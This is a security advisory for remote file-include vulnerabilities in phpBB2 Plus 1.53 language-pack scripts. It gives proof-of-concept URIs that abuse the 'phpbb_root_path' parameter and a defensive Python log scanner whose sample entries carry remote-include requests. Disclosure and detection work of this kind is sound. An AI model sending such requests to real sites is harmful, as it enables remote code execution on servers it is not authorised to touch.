PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities
BID:25776
Info
| Bugtraq ID: | 25776 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-5100 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 24 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | The vendor disclosed these issues. |
| Vulnerable: | phpBB2 phpBB2 Plus 1.53 |
| Not Vulnerable: | phpBB2 phpBB2 Plus 1.53a |
Discussion
phpBB2 Plus is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input passed to the 'phpbb_root_path' parameter of its language-pack scripts.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to phpBB2 Plus 1.53a are affected.
Exploit / POC
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_main_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=
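For triage, the request shape in the URIs above can be searched for in web server access logs. The following Python sketch is an added example, not code from the advisory or from phpBB2 Plus; it assumes combined-format access logs, and the sample lines, client addresses and the `placeholder.invalid` host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Language-pack scripts, the location named in the advisory's title and URIs.
LANG_PATH_RE = re.compile(r'/language/lang_[^/]+/[^/]+\.php$', re.IGNORECASE)
# A value that starts with a URL scheme or "//" names a resource on another host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.IGNORECASE)

def classify(line):
    """Return None, 'param-supplied' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not LANG_PATH_RE.search(unquote(parts.path)):
        return None
    verdict = None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != 'phpbb_root_path':
            continue
        # parse_qsl has already percent-decoded the value once.
        if REMOTE_RE.match(value):
            return 'remote-include'
        verdict = 'param-supplied'  # clients have no reason to set this at all
    return verdict

def scan(lines):
    """Yield (line_number, verdict, client_ip) for every suspicious line."""
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            yield n, verdict, line.split(' ', 1)[0]

# Constructed sample log lines (documentation address ranges, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [24/Sep/2007:10:00:01 +0000] "GET /language/lang_english/lang_main_album.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Sep/2007:10:00:05 +0000] "GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://placeholder.invalid/x.txt?a= HTTP/1.1" 200 40',
    '198.51.100.7 - - [24/Sep/2007:10:00:09 +0000] "GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http%3A%2F%2Fplaceholder.invalid%2Fx HTTP/1.1" 200 40',
    '192.0.2.44 - - [24/Sep/2007:10:01:00 +0000] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=./ HTTP/1.1" 200 512',
    '192.0.2.10 - - [24/Sep/2007:10:02:00 +0000] "GET /index.php?phpbb_root_path=http://placeholder.invalid/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A `remote-include` hit with a 200 response on a 1.53 installation warrants incident handling; `param-supplied` hits are probes worth correlating by client address.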
Solution / Fix
Solution:
The vendor released phpBB2 Plus 1.53a to address these issues. Please see the references for more information.
phpBB2 phpBB2 Plus 1.53
- phpBB2 phpbb2_plus_1.53a.zip
  http://www.phpbb2.de/dload.php?action=download&file_id=828
References
References:
- phpBB2 Plus 1.53a Language File Vulnerable (phpBB2)
- phpBB2 Plus Homepage (phpBB2)